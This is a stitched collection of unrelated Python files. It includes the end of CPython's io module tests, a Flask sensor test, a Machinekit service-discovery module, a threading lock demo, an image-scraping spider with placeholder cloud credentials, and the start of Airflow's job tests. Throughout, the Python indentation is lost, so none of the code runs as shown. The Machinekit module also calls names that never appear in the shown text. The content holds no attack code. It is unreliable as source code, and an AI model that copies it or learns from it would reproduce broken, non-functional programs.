_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
test_sensor.py | from test_data.test_sensor_1 import SensorDummy1
from threading import Thread
import json
import time
from flask import Flask, request
cloud_gateway_ip = 'localhost'
cloud_gateway_port = 5000
class TestSensor:
@staticmethod
def _get_dummy_sensor():
sensor = SensorDummy1()
sensor.set_module_id(1)
sensor.set_send_interval(0.5)
sensor.set_reads_per_minute(480)
sensor.set_module_name('test_get_sensor')
sensor.set_cloud_gateway_ip(cloud_gateway_ip)
sensor.set_cloud_gateway_port(cloud_gateway_port)
return sensor
@staticmethod
def _get_test_api(host, port, route):
app = Flask('test_api')
messages = []
@app.route(route, methods=['POST'])
def receive_device_registration():
messages.append(request.get_data())
return json.dumps({'success': True, 'id': 0}), 200, {'ContentType': 'application/json'},
return Thread(target=app.run, kwargs={'host': host, 'port': port}, daemon=True), messages
def test_int_message(self):
"""
test value of type int
"""
sensor = self._get_dummy_sensor()
list_msg = sensor.create_event_messages({'test': 23})
msg = json.loads(list_msg[0])
assert len(list_msg) == 1
assert msg['module_name'] == 'test_get_sensor'
assert msg['value_type'] == 'int'
assert msg['tag'] == 'test'
assert msg['value'] == '23'
def test_float_message(self):
"""
test value of type float
"""
sensor = self._get_dummy_sensor()
msg_list = sensor.create_event_messages({'test': 23.3})
msg = json.loads(msg_list[0])
assert msg['value_type'] == 'float'
assert msg['value'] == '23.3'
def test_str_message(self):
"""
test value of type str
"""
sensor = self._get_dummy_sensor()
msg_list = sensor.create_event_messages({'test': 'asdf'})
msg = json.loads(msg_list[0])
assert msg['value_type'] == 'str'
assert msg['value'] == 'asdf'
def test_list_message(self):
"""
test value of type list
"""
sensor = self._get_dummy_sensor()
msg_list = sensor.create_event_messages({'test_1': 23.3, 'test_2': 'wat'})
msg_0 = json.loads(msg_list[0])
msg_1 = json.loads(msg_list[1])
assert msg_0['value_type'] == 'float'
assert msg_0['value'] == '23.3'
assert msg_1['value_type'] == 'str'
assert msg_1['value'] == 'wat'
def test_device_registration(self):
"""
Tests if the sensor module actually sends a registration message via http
"""
sensor = self._get_dummy_sensor()
sensor.set_cloud_gateway_port(5001)
test_api, messages = self._get_test_api(
sensor.cloud_gateway_ip, sensor.cloud_gateway_port, '/repository/devices')
test_api.start()
time.sleep(1)
sensor.register()
time.sleep(1)
for msg in messages:
print(json.loads(msg.decode()))
assert len(messages) > 0
assert json.loads(messages[0].decode())['module_name'] == 'test_get_sensor'
sensor.stopped.set()
test_api.join(timeout=1)
def test_event_sending(self):
"""
Tests if the sensor module actually sends the values from get_data and sends them via http
"""
sensor = self._get_dummy_sensor()
sensor.set_cloud_gateway_port(5002)
test_api, messages = self._get_test_api(
sensor.cloud_gateway_ip, sensor.cloud_gateway_port, '/repository/events')
test_api.start()
time.sleep(1)
sensor.start()
time.sleep(1)
for msg in messages:
print(json.loads(msg.decode()))
assert len(messages) > 0
assert json.loads(messages[0].decode())['module_name'] == 'test_get_sensor'
sensor.stopped.set()
test_api.join(timeout=1)
|
MachinekitInstance.py | # MachinekitInstance
#
# The classes in this file deal with service discovery and keep track of all discovered Machinekit
# instances and their associated endpoints.
import MachinekitPreferences
import copy
import itertools
import json
import threading
import time
import urllib.request
import zeroconf
class ServiceEndpoint(object):
'''POD for describing a service end point.'''
def __init__(self, service, name, addr, prt, properties):
self.service = service
self.name = name
self.addr = addr
self.prt = prt
self.properties = properties
self.dsn = properties[b'dsn']
self.uuid = properties[b'instance']
def __str__(self):
return "%s@%s:%d" % (self.service, self.address(), self.port())
def addressRaw(self):
'''Return the endoint address in its raw format.'''
return self.addr
def address(self):
'''Return the endpoint address as an IPv4 string.'''
if str == type(self.addr):
return self.addr
return "%d.%d.%d.%d" % (self.addr[0], self.addr[1], self.addr[2], self.addr[3])
def port(self):
'''Return the endpoint port number.'''
return self.prt
class MachinekitInstance(object):
'''Representation of a discovered MK instance, tying all associated services together.'''
def __init__(self, uuid, properties):
self.uuid = uuid
self.properties = properties
self.endpoint = {}
self.lock = threading.Lock()
def __str__(self):
with self.lock:
return "MK(%s): %s" % (self.uuid.decode(), sorted([ep.service for epn, ep in self.endpoint.items()]))
def _addService(self, properties, name, address, port):
s = properties[b'service'].decode()
with self.lock:
endpoint = ServiceEndpoint(s, name, address, port, properties)
self.endpoint[s] = endpoint
def _removeService(self, name):
with self.lock:
for epn, ep in self.endpoint.items():
if ep.name == name:
del self.endpoint[epn]
break
def endpointFor(self, service):
'''endpointFor(service) ... return the MK endpoint for the given service.'''
with self.lock:
return self.endpoint.get(service)
def services(self):
'''services() ... returns the list of service names discovered for this MK instance.'''
with self.lock:
return [service for service in self.endpoint]
def serviceThread(monitor):
issue = {}
while True:
with monitor.lock:
explicit = copy.copy(monitor.explicit)
for host in explicit:
if not ':' in host:
host += ':8088'
try:
s = urllib.request.urlopen("http://%s/machinekit" % host).read()
j = json.loads(s)
#print('serivces:', [j[k] for k in j])
with monitor.lock:
mk = None
for name in j:
props = j[name]
properties = {}
for l in props:
properties[l.encode()] = props[l].encode()
uuid = properties[b'uuid']
mk = monitor.instance.get(uuid)
if mk is None:
mk = MachinekitInstance(uuid, properties)
monitor.instance[uuid] = mk
if mk.endpointFor(name) is None:
dsn = props['dsn'].split(':')
mk._addService(properties, name, dsn[1].strip('/'), int(dsn[2]))
if not mk is None:
for service in mk.services():
if j.get(service) is None:
mk._removeService(service)
issue[host] = None
except Exception as e:
# this happens when MK isn't running or the host isn't even routable
err = str(e)
if issue.get(host) != err:
print("%s - %s" % (host, err))
issue[host] = err
time.sleep(1)
class ServiceMonitor(object):
'''Singleton for the zeroconf service discovery. DO NOT USE.'''
_Instance = None
def __init__(self, explicit=None):
self.zc = zeroconf.Zeroconf()
self.browser = zeroconf.ServiceBrowser(self.zc, "_machinekit._tcp.local.", self)
self.instance = {}
self.explicit = explicit if explicit else MachinekitPreferences.restServers()
self.lock = threading.Lock()
self.thread = threading.Thread(target=serviceThread, args=(self,), daemon=True)
self.thread.start()
# zeroconf.ServiceBrowser interface
def remove_service(self, zc, typ, name):
with self.lock:
for mkn, mk in self.instance.items():
mk._removeService(name)
def add_service(self, zc, typ, name):
info = zc.get_service_info(typ, name)
if info and info.properties.get(b'service'):
with self.lock:
uuid = info.properties[b'uuid']
mk = self.instance.get(uuid)
if not mk:
mk = MachinekitInstance(uuid, info.properties)
self.instance[uuid] = mk
mk._addService(info.properties, info.name, info.address, info.port)
else:
name = ' '.join(itertools.takewhile(lambda s: s != 'service', info.name.split()))
PathLog.info("machinetalk.%-13s - no info" % (name))
def instances(self, services):
with self.lock:
return [mk for mkn, mk in self.instance.items() if services is None or mk.providesServices(services)]
|
mutex.py | import threading
counter_buffer = 0
counter_lock = threading.Lock()
COUNTER_MAX = 100
THREAD_COUNT = 5
def consumer1_counter():
global counter_buffer
for i in range(COUNTER_MAX):
#counter_lock.acquire()
counter_buffer +=1
#counter_lock.release()
def consumer2_counter():
global counter_buffer
for i in range(COUNTER_MAX):
counter_lock.acquire()
counter_buffer +=1
counter_lock.release()
threadList=[]
for i in range(THREAD_COUNT):
th = threading.Thread(target=consumer1_counter, args=(), name='thread')
threadList.append(th)
#th2 = threading.Thread(target=consumer2_counter, args=(), name='consumer1')
for threads in threadList:
threads.start()
threads.join()
#th1.start()
#th2.start()
#th1.join()
#th2.join()
print(counter_buffer)
|
main.py | # _*_coding:utf-8_*_
# @Time : 2020/5/2 下午1:38
# @Author : Arics
# @Email : 739386753@qq.com
# @File : main.py
# @Software : PyCharm
# @IDE : PyCharm
import quequ_list
import spiderModule
import selectModule
from threading import Thread
import time
import log_record
import monitor
######
## 又拍云账号信息
######
bucketName = "你的数据桶名称"
operatorName = "你的操作员名称"
password = "你的操作员密码"
######
## 邮件设置
######
sendTime = 60 # 邮件发送时间间隔(s)
Quequ = quequ_list.quequ()
Select = selectModule.select(bucketName, operatorName, password)
Spider = spiderModule.spider(Quequ)
Monitor = monitor.monitor(Quequ, Spider, Select)
flag = []
def getPage(flag, ThreadName):
'''
这是获取page页面的线程函数
'''
while(not flag):
urlMSG = Quequ.outputPageUrl()
url = urlMSG[0]
code = urlMSG[1]
response = Spider.getHTML(url)
log_record.log_record("[Page][Message]", ThreadName, url)
if response == -1:
log_record.log_record("[Page][Warming]", ThreadName, "Get html error!")
else:
log_record.log_record("[Page][Message]", ThreadName, "Get a page-html.")
urlList = Select.selectMain(response, code)
log_record.log_record("[Page][Message]", ThreadName, "Get a urlList.")
inputRerutn = Quequ.inputUrl(urlList)
inputNum = inputRerutn['inputNum']
log_record.log_record("[Page][Message]", ThreadName, "Input these url. >> " + str(inputNum)+'/'+str(len(urlList)))
def getPicture(flag, ThreadName):
'''
这是获取和保存图片的线程函数
'''
time.sleep(10)
while(not flag):
urlMSG = Quequ.outputPicUrl()
if urlMSG == -1:
time.sleep(30)
log_record.log_record("[Picture][Message]", ThreadName, "The Picture-url is empty.")
else:
url = urlMSG[0]
code = urlMSG[1]
log_record.log_record("[Picture][Message]", ThreadName, url)
response = Spider.getHTML(url)
if response == -1:
log_record.log_record("[Picture][Message]", ThreadName, "Get Picture error!")
else:
result = Select.selectMain(response, code)
log_record.log_record("[Picture][Message]", ThreadName, "Get a Picture successful.")
def moni(sendTime, flag):
i = 0
while(not flag):
if i >= 10:
Monitor.monitorMain(1)
else:
Monitor.monitorMain(0)
i += 1
time.sleep(sendTime)
def saveExit():
'''
这个函数在退出的时候被进程调用
用以保存爬虫的进度
'''
Quequ.saveExit()
Select.saveExit()
Spider.saveExit()
if __name__ == '__main__':
Thread_Page_1 = Thread(name="Page-1", target=getPage, args=(flag, "Page-1"))
Thread_Picture_1 = Thread(name="Picture-1", target=getPicture, args=(flag, "Picture-1"))
Thread_Monitor = Thread(name="Monitor", target=moni, args=(sendTime, flag))
Thread_saveExit = Thread(name="saveExit", target=saveExit)
ThreadList = [Thread_Picture_1, Thread_Page_1, Thread_Monitor]
for each in ThreadList:
each.start()
input_flag = input()
flag.append(1)
log_record.log_record("[Program][Message]", "Program", "Wait All Thread exit.")
for each in ThreadList:
each.join()
Thread_saveExit.start()
Thread_saveExit.join()
log_record.log_record("[Program][Message]", "Program", "Save data successful.")
log_record.log_record("[Program][Message]", "Program", "Exit successful.")
|
test_jobs.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from parameterized import parameterized
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI, \
errors
from airflow.models.slamiss import SlaMiss
from airflow.operators.bash_operator import BashOperator
